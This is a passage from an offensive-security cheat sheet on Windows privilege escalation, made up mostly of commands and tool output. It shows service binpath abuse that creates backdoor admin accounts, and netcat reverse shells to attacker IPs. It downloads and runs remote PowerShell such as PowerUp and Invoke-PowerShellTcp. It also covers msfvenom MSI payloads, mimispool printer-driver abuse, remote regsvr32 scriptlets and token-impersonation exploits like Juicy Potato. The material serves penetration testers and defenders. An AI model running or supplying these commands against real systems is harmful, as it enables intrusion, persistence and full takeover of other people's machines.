    743 ```
    744 
    745 Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals or [accesschk-XP.exe - github.com/phackt](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe)
    746 
    747 ```powershell
    748 $ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
    749 RW SSDPSRV
    750         SERVICE_ALL_ACCESS
    751 RW upnphost
    752         SERVICE_ALL_ACCESS
    753 
    754 $ accesschk.exe -ucqv upnphost
    755 upnphost
    756   RW NT AUTHORITY\SYSTEM
    757         SERVICE_ALL_ACCESS
    758   RW BUILTIN\Administrators
    759         SERVICE_ALL_ACCESS
    760   RW NT AUTHORITY\Authenticated Users
    761         SERVICE_ALL_ACCESS
    762   RW BUILTIN\Power Users
    763         SERVICE_ALL_ACCESS
    764 
    765 $ sc config <vuln-service> binpath="net user backdoor backdoor123 /add"
    766 $ sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
    767 $ sc stop <vuln-service>
    768 $ sc start <vuln-service>
    769 $ sc config <vuln-service> binpath="net localgroup Administrators backdoor /add"
    770 $ sc stop <vuln-service>
    771 $ sc start <vuln-service>
    772 ```
    773 
    774 ## EoP - Windows Subsystem for Linux (WSL)
    775 
    776 > With root privileges Windows  Subsystem for Linux (WSL)  allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ `<distro>.exe --default-user root`. Now start your bind shell or reverse. - [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
    777 
    778 ```powershell
    779 wsl whoami
    780 ./ubuntun1604.exe config --default-user root
    781 wsl whoami
    782 wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
    783 ```
    784 
    785 Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`
    786 
    787 Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
    788 
    789 ## EoP - Unquoted Service Paths
    790 
    791 The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
    792 
    793 ```powershell
    794 # in CMD
    795 wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """
    796 wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """
    797 # in PowerShell
    798 gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
    799 ```
    800 
    801 * Metasploit exploit : `exploit/windows/local/trusted_service_path`
    802 * PowerUp exploit
    803 
    804     ```powershell
    805     # find the vulnerable application
    806     C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
    807 
    808     ...
    809     [*] Checking for unquoted service paths...
    810     ServiceName   : BBSvc
    811     Path          : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
    812     StartName     : LocalSystem
    813     AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
    814     ...
    815 
    816     # automatic exploit
    817     Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
    818     ```
    819 
    820 ### Example
    821 
    822 For `C:\Program Files\something\legit.exe`, Windows will try the following paths first:
    823 
    824 * `C:\Program.exe`
    825 * `C:\Program Files.exe`
    826 
    827 ## EoP - $PATH Interception
    828 
    829 Requirements:
    830 
    831 * PATH contains a writable folder with low privileges.
    832 * The writable folder is _before_ the folder that contains the legitimate binary.
    833 
    834 EXAMPLE:
    835 
    836 ```powershell
    837 # List contents of the PATH environment variable
    838 # EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32
    839 $env:Path
    840 
    841 # See permissions of the target folder
    842 # EXAMPLE OUTPUT: BUILTIN\Users: GR,GW
    843 icacls.exe "C:\Program Files\nodejs\"
    844 
    845 # Place our evil-file in that folder.
    846 copy evil-file.exe "C:\Program Files\nodejs\cmd.exe"
    847 ```
    848 
    849 Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\system32\" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder.
    850 
    851 ## EoP - Named Pipes
    852 
    853 1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")`
    854 2. Check named pipes DACL: `pipesec.exe <named_pipe>`
    855 3. Reverse engineering software
    856 4. Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe`
    857 
    858 ## EoP - Kernel Exploitation
    859 
    860 List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)
    861 
    862 ### Security Bulletin Table
    863 
    864 | Security Bulletin                                                                             | KB        | Description                                      | Operating System                    |
    865 | --------------------------------------------------------------------------------------------- | --------- | ------------------------------------------------ | ----------------------------------- |
    866 | [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017)           | KB4013081 | GDI Palette Objects Local Privilege Escalation   | Windows 7/8                         |
    867 | [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464) | -         | LNK Remote Code Execution Vulnerability          | Windows 10/8.1/7/2016/2010/2008     |
    868 | [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213) | -         | Windows COM Elevation of Privilege Vulnerability | Windows 10/8.1/7/2016/2010/2008     |
    869 | [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833) | -         | SMBv3 Null Pointer Dereference Denial of Service | Windows 8.1/Server 2012 R2          |
    870 | [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) | -         | Win32k Elevation of Privilege Vulnerability      | Windows 7 SP1/2008 SP2, 2008 R2 SP1 |
    871 | [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010)           | KB4013389 | Windows Kernel Mode Drivers                      | Windows 7/2008/2003/XP              |
    872 | [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135)           | KB3199135 | Windows Kernel Mode Drivers                      | 2016                                |
    873 | [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111)           | KB3186973 | Kernel API                                       | Windows 10 10586 (32/64)/8.1        |
    874 | [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098)           | KB3178466 | Kernel Driver                                    | Windows 8.1                         |
    875 | [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075)           | KB3164038 | Hot Potato                                       | 2003/2008/7/8/2012                  |
    876 | [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034)           | KB3143145 | Kernel Driver                                    | 2008/7/8/10/2012                    |
    877 | [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032)           | KB3143141 | Secondary Logon Handle                           | 2008/7/8/10/2012                    |
    878 | [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016)           | KB3136041 | WebDAV                                           | 2008/Vista/7                        |
    879 | [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014)           | KB3134228 | Remote Code Execution                            | 2008/Vista/7                        |
    880 | [MS03-026](https://www.exploit-db.com/exploits/66)                                            | KB823980  | Buffer Overrun In RPC Interface                  | NT/2000/XP/2003                     |
    881 
    882 To cross compile a program from Kali, use the following command.
    883 
    884 ```powershell
    885 Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
    886 ```
    887 
    888 ## EoP - Microsoft Windows Installer
    889 
    890 ### AlwaysInstallElevated
    891 
    892 Using the `reg query` command, you can check the status of the `AlwaysInstallElevated` registry key for both the user and the machine. If both queries return a value of `0x1`, then `AlwaysInstallElevated` is enabled for both user and machine, indicating the system is vulnerable.
    893 
    894 * Shell command
    895 
    896     ```powershell
    897     reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    898     reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    899     ```
    900 
    901 * PowerShell command
    902 
    903     ```powershell
    904     Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
    905     Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
    906     ```
    907 
    908 Then create an MSI package and install it.
    909 
    910 ```powershell
    911 msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
    912 msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi
    913 msiexec /quiet /qn /i C:\evil.msi
    914 ```
    915 
    916 Technique also available in :
    917 
    918 * Metasploit : `exploit/windows/local/always_install_elevated`
    919 * PowerUp.ps1 : `Get-RegistryAlwaysInstallElevated`, `Write-UserAddMSI`
    920 
    921 ### CustomActions
    922 
    923 > Custom Actions in MSI allow developers to specify scripts or executables to be run at various points during an installation
    924 
    925 * [mgeeky/msidump](https://github.com/mgeeky/msidump) - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner.
    926 * [activescott/lessmsi](https://github.com/activescott/lessmsi) - A tool to view and extract the contents of an Windows Installer (.msi) file.
    927 * [mandiant/msi-search](https://github.com/mandiant/msi-search) - This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file.
    928 
    929 Enumerate products on the machine
    930 
    931 ```ps1
    932 Get-WmiObject Win32_Product | Select Name, LocalPackage
    933 wmic product get identifyingnumber,name,vendor,version,localpackage
    934 ```
    935 
    936 Execute the repair process with the `/fa` parameter to trigger the CustomActions.
    937 We can use both IdentifyingNumber `{E0F1535A-8414-5EF1-A1DD-E17EDCDC63F1}` or path to the installer `c:\windows\installer\XXXXXXX.msi`.
    938 The repair will run with the NT SYSTEM account.
    939 
    940 ```ps1
    941 $installed = Get-WmiObject Win32_Product
    942 $string= $installed | select-string -pattern "PRODUCTNAME"
    943 $string[0] -match '{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}}'
    944 Start-Process -FilePath "msiexec.exe" -ArgumentList "/fa $($matches[0])"
    945 ```
    946 
    947 Common mistakes in MSI installers:
    948 
    949 * Missing quiet parameters: it will spawn `conhost.exe` as `NT SYSTEM`. Use `[CTRL]+[A]` to select some text in it, it will pause the execution.
    950     * conhost -> properties -> "legacy console mode" Link -> Internet Explorer -> CTRL+O –> cmd.exe
    951 * GUI with direct actions: open a URL and start the browser then use the same scenario.
    952 * Binaries/Scripts loaded from user writable paths: you might need to win the race condition.
    953 * DLL hijacking/search order abusing
    954 * PowerShell `-NoProfile` missing: Add custom commands into your profile
    955 
    956     ```ps1
    957     new-item -Path $PROFILE -Type file -Force
    958     echo "Start-Process -FilePath cmd.exe -Wait;" > $PROFILE
    959     ```
    960 
    961 ## EoP - Insecure GUI apps
    962 
    963 Application running as SYSTEM allowing an user to spawn a CMD, or browse directories.
    964 
    965 Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
    966 
    967 ## EoP - Evaluating Vulnerable Drivers
    968 
    969 Look for vuln drivers loaded, we often don't spend enough time looking at this:
    970 
    971 * [Living Off The Land Drivers](https://www.loldrivers.io/) is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats.
    972 * Native binary: DriverQuery.exe
    973 
    974     ```powershell
    975     PS C:\Users\Swissky> driverquery.exe /fo table /si
    976     Module Name  Display Name           Driver Type   Link Date
    977     ============ ====================== ============= ======================
    978     1394ohci     1394 OHCI Compliant Ho Kernel        12/10/2006 4:44:38 PM
    979     3ware        3ware                  Kernel        5/18/2015 6:28:03 PM
    980     ACPI         Microsoft ACPI Driver  Kernel        12/9/1975 6:17:08 AM
    981     AcpiDev      ACPI Devices driver    Kernel        12/7/1993 6:22:19 AM
    982     acpiex       Microsoft ACPIEx Drive Kernel        3/1/2087 8:53:50 AM
    983     acpipagr     ACPI Processor Aggrega Kernel        1/24/2081 8:36:36 AM
    984     AcpiPmi      ACPI Power Meter Drive Kernel        11/19/2006 9:20:15 PM
    985     acpitime     ACPI Wake Alarm Driver Kernel        2/9/1974 7:10:30 AM
    986     ADP80XX      ADP80XX                Kernel        4/9/2015 4:49:48 PM
    987     <SNIP>
    988     ```
    989 
    990 * [matterpreter/OffensiveCSharp/DriverQuery](https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery)
    991 
    992     ```powershell
    993     PS C:\Users\Swissky> DriverQuery.exe --no-msft
    994     [+] Enumerating driver services...
    995     [+] Checking file signatures...
    996     Citrix USB Filter Driver
    997         Service Name: ctxusbm
    998         Path: C:\Windows\system32\DRIVERS\ctxusbm.sys
    999         Version: 14.11.0.138
   1000         Creation Time (UTC): 17/05/2018 01:20:50
   1001         Cert Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
   1002         Signer: CN="Citrix Systems, Inc.", OU=XenApp(ClientSHA256), O="Citrix Systems, Inc.", L=Fort Lauderdale, S=Florida, C=US
   1003     <SNIP>
   1004     ```
   1005 
   1006 ## EoP - Printers
   1007 
   1008 ### Universal Printer
   1009 
   1010 Create a Printer
   1011 
   1012 ```ps1
   1013 $printerName     = 'Universal Priv Printer'
   1014 $system32        = $env:systemroot + '\system32'
   1015 $drivers         = $system32 + '\spool\drivers'
   1016 $RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
   1017  
   1018 Copy-Item -Force -Path ($system32 + '\mscms.dll')             -Destination ($system32 + '\mimispool.dll')
   1019 Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll'   -Destination ($drivers  + '\x64\3\mimispool.dll')
   1020 Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers  + '\W32X86\3\mimispool.dll')
   1021  
   1022 Add-PrinterDriver -Name       'Generic / Text Only'
   1023 Add-Printer       -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
   1024  
   1025 New-Item         -Path ($RegStartPrinter + '\CopyFiles')        | Out-Null
   1026 New-Item         -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   | Out-Null
   1027 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Directory' -PropertyType 'String'      -Value 'x64\3'           | Out-Null
   1028 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
   1029 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null
   1030 New-Item         -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
   1031 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String'      -Value 'W32X86\3'        | Out-Null
   1032 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
   1033 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null
   1034 New-Item         -Path ($RegStartPrinter + '\CopyFiles\Mango')  | Out-Null
   1035 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Directory' -PropertyType 'String'      -Value $null             | Out-Null
   1036 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Files'     -PropertyType 'MultiString' -Value $null             | Out-Null
   1037 New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Module'    -PropertyType 'String'      -Value 'mimispool.dll'   | Out-Null
   1038 ```
   1039 
   1040 Execute the driver
   1041 
   1042 ```ps1
   1043 $serverName  = 'dc.purple.lab'
   1044 $printerName = 'Universal Priv Printer'
   1045 $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'})
   1046 Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
   1047 Add-Printer -ConnectionName $fullprinterName
   1048 ```
   1049 
   1050 ### PrinterNightmare
   1051 
   1052 ```ps1
   1053 git clone https://github.com/Flangvik/DeployPrinterNightmare
   1054 PS C:\adversary> FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell
   1055 [<3] @Flangvik - TrustedSec
   1056 [+] Copying C:\Windows\system32\mscms.dll to C:\Windows\system32\6cfbaf26f4c64131896df8a522546e9c.dll
   1057 [+] Copying 64mimispool.dll to C:\Windows\system32\spool\drivers\x64\3\6cfbaf26f4c64131896df8a522546e9c.dll
   1058 [+] Copying 32mimispool.dll to C:\Windows\system32\spool\drivers\W32X86\3\6cfbaf26f4c64131896df8a522546e9c.dll
   1059 [+] Adding printer driver => Generic / Text Only!
   1060 [+] Adding printer => EasySystemShell!
   1061 [+] Setting 64-bit Registry key
   1062 [+] Setting 32-bit Registry key
   1063 [+] Setting '*' Registry key
   1064 ```
   1065 
   1066 ```ps1
   1067 PS C:\target> $serverName  = 'printer-installed-host'
   1068 PS C:\target> $printerName = 'EasySystemShell'
   1069 PS C:\target> $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'})
   1070 PS C:\target> Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
   1071 PS C:\target> Add-Printer -ConnectionName $fullprinterName
   1072 ```
   1073 
   1074 ### Bring Your Own Vulnerability
   1075 
   1076 [jacob-baines/concealed_position](https://github.com/jacob-baines/concealed_position)
   1077 
   1078 * ACIDDAMAGE - [CVE-2021-35449](https://nvd.nist.gov/vuln/detail/CVE-2021-35449) - Lexmark Universal Print Driver LPE
   1079 * RADIANTDAMAGE - [CVE-2021-38085](https://nvd.nist.gov/vuln/detail/CVE-2021-38085) - Canon TR150 Print Driver LPE
   1080 * POISONDAMAGE - [CVE-2019-19363](https://nvd.nist.gov/vuln/detail/CVE-2019-19363) - Ricoh PCL6 Print Driver LPE
   1081 * SLASHINGDAMAGE - [CVE-2020-1300](https://nvd.nist.gov/vuln/detail/CVE-2020-1300) - Windows Print Spooler LPE
   1082 
   1083 ```powershell
   1084 cp_server.exe -e ACIDDAMAGE
   1085 # Get-Printer
   1086 # Set the "Advanced Sharing Settings" -> "Turn off password protected sharing"
   1087 cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
   1088 cp_client.exe -l -e ACIDDAMAGE
   1089 ```
   1090 
   1091 ## EoP - Runas
   1092 
   1093 Use the `cmdkey` to list the stored credentials on the machine.
   1094 
   1095 ```powershell
   1096 cmdkey /list
   1097 Currently stored credentials:
   1098  Target: Domain:interactive=WORKGROUP\Administrator
   1099  Type: Domain Password
   1100  User: WORKGROUP\Administrator
   1101 ```
   1102 
   1103 Then you can use `runas` with the `/savecred` options in order to use the saved credentials.
   1104 The following example is calling a remote binary via an SMB share.
   1105 
   1106 ```powershell
   1107 runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
   1108 runas /savecred /user:Administrator "cmd.exe /k whoami"
   1109 ```
   1110 
   1111 Using `runas` with a provided set of credential.
   1112 
   1113 ```powershell
   1114 C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
   1115 ```
   1116 
   1117 ```powershell
   1118 $secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
   1119 $mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
   1120 $computer = "<hostname>"
   1121 [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
   1122 ```
   1123 
   1124 ## EoP - Abusing Shadow Copies
   1125 
   1126 If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation.
   1127 
   1128 ```powershell
   1129 # List shadow copies using vssadmin (Needs Admnistrator Access)
   1130 vssadmin list shadows
   1131   
   1132 # List shadow copies using diskshadow
   1133 diskshadow list shadows all
   1134   
   1135 # Make a symlink to the shadow copy and access it
   1136 mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
   1137 ```
   1138 
   1139 ## EoP - From local administrator to NT SYSTEM
   1140 
   1141 ```powershell
   1142 PsExec.exe -i -s cmd.exe
   1143 ```
   1144 
   1145 ## EoP - Living Off The Land Binaries and Scripts
   1146 
   1147 Living Off The Land Binaries and Scripts (and also Libraries) : [lolbas-project.github.io](https://lolbas-project.github.io)
   1148 
   1149 > The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.
   1150 
   1151 A LOLBin/Lib/Script must:
   1152 
   1153 * Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft.
   1154 Have extra "unexpected" functionality. It is not interesting to document intended use cases.
   1155 Exceptions are application whitelisting bypasses
   1156 * Have functionality that would be useful to an APT or red team
   1157 
   1158 ```powershell
   1159 wmic.exe process call create calc
   1160 regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
   1161 Microsoft.Workflow.Compiler.exe tests.xml results.xml
   1162 ```
   1163 
   1164 ## EoP - Impersonation Privileges
   1165 
   1166 Full privileges cheatsheet at [gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin), summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.
   1167 
   1168 | Privilege              | Impact      | Tool                    | Execution path                                                                                                                                                                                                                                                                                                                   | Remarks                                                                                                                                                                                                                                                          |
   1169 | ---------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
   1170 | `SeAssignPrimaryToken` | _**Admin**_ | 3rd party tool          | _"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"_                                                                                                                                                                                    | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon.                                                                                                                           |
   1171 | `SeBackup`             | **Threat**  | _**Built-in commands**_ | Read sensitve files with `robocopy /b`                                                                                                                                                                                                                                                                                           | - May be more interesting if you can read %WINDIR%\MEMORY.DMP<br> <br>- `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.<br> <br>- Robocopy requires both SeBackup and SeRestore to work with /b parameter.                        |
   1172 | `SeCreateToken`        | _**Admin**_ | 3rd party tool          | Create arbitrary token including local admin rights with `NtCreateToken`.                                                                                                                                                                                                                                                        |                                                                                                                                                                                                                                                                  |
   1173 | `SeDebug`              | _**Admin**_ | **PowerShell**          | Duplicate the `lsass.exe` token.                                                                                                                                                                                                                                                                                                 | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1)                                                                                                                                           |
   1174 | `SeLoadDriver`         | _**Admin**_ | 3rd party tool          | 1. Load buggy kernel driver such as `szkg64.sys` or `capcom.sys`<br>2. Exploit the driver vulnerability<br> <br> Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv`                                                                               | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)<br>2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) |
   1175 | `SeRestore`            | _**Admin**_ | **PowerShell**          | 1. Launch PowerShell/ISE with the SeRestore privilege present.<br>2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).<br>3. Rename utilman.exe to utilman.old<br>4. Rename cmd.exe to utilman.exe<br>5. Lock the console and press Win+U | Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.                                                                                                  |
   1176 | `SeTakeOwnership`      | _**Admin**_ | _**Built-in commands**_ | 1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U                                                                                                                                                  | Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.                                                                                                  |
   1177 | `SeTcb`                | _**Admin**_ | 3rd party tool          | Manipulate tokens to have local admin rights included. May require SeImpersonate.<br> <br>To be verified.                                                                                                                                                                                                                        |                                                                                                                                                                                                                                                                  |
   1178 | `SeRelabel`            | _**Admin**_ | 3rd party too           | [decoder-it/RelabelAbuse](https://github.com/decoder-it/RelabelAbuse)                                                                                                                                                                                                                                                            | Allows you to own resources that have an integrity level even higher than your own                                                                                                                                                                               |
   1179 
   1180 ### Restore A Service Account's Privileges
   1181 
   1182 > This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
   1183 
   1184 ```powershell
   1185 # https://github.com/itm4n/FullPowers
   1186 
   1187 c:\TOOLS>FullPowers
   1188 [+] Started dummy thread with id 9976
   1189 [+] Successfully created scheduled task.
   1190 [+] Got new token! Privilege count: 7
   1191 [+] CreateProcessAsUser() OK
   1192 Microsoft Windows [Version 10.0.19041.84]
   1193 (c) 2019 Microsoft Corporation. All rights reserved.
   1194 
   1195 C:\WINDOWS\system32>whoami /priv
   1196 PRIVILEGES INFORMATION
   1197 ----------------------
   1198 Privilege Name                Description                               State
   1199 ============================= ========================================= =======
   1200 SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
   1201 SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
   1202 SeAuditPrivilege              Generate security audits                  Enabled
   1203 SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
   1204 SeImpersonatePrivilege        Impersonate a client after authentication Enabled
   1205 SeCreateGlobalPrivilege       Create global objects                     Enabled
   1206 SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
   1207 
   1208 c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
   1209 ```
   1210 
   1211 ### Meterpreter getsystem and alternatives
   1212 
   1213 ```powershell
   1214 meterpreter> getsystem 
   1215 Tokenvator.exe getsystem cmd.exe 
   1216 incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe 
   1217 psexec -s -i cmd.exe 
   1218 python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
   1219 ```
   1220 
   1221 ### RottenPotato (Token Impersonation)
   1222 
   1223 * Binary available at : [foxglovesec/RottenPotato](https://github.com/foxglovesec/RottenPotato) and [breenmachine/RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)
   1224 * Exploit using Metasploit with `incognito mode` loaded.
   1225 
   1226     ```c
   1227     getuid
   1228     getprivs
   1229     use incognito
   1230     list\_tokens -u
   1231     cd c:\temp\
   1232     execute -Hc -f ./rot.exe
   1233     impersonate\_token "NT AUTHORITY\SYSTEM"
   1234     ```
   1235 
   1236 ```powershell
   1237 Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
   1238 Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
   1239 Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
   1240 ```
   1241 
   1242 ### Juicy Potato (Abusing the golden privileges)
   1243 
   1244 > If the machine is **>= Windows 10 1809 & Windows Server 2019** - Try **Rogue Potato**
   1245 > If the machine is **< Windows 10 1809 < Windows Server 2019** - Try **Juicy Potato**
   1246 
   1247 * Binary available at : [ohpe/juicy-potato](https://github.com/ohpe/juicy-potato/releases)
   1248 
   1249 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
   1250 
   1251     ```powershell
   1252     whoami /priv
   1253     ```
   1254 
   1255 2. Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object
   1256 
   1257     * [Windows 7 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise)
   1258     * [Windows 8.1 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise)
   1259     * [Windows 10 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise)
   1260     * [Windows 10 Professional](https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro)
   1261     * [Windows Server 2008 R2 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise)
   1262     * [Windows Server 2012 Datacenter](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter)
   1263     * [Windows Server 2016 Standard](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard)
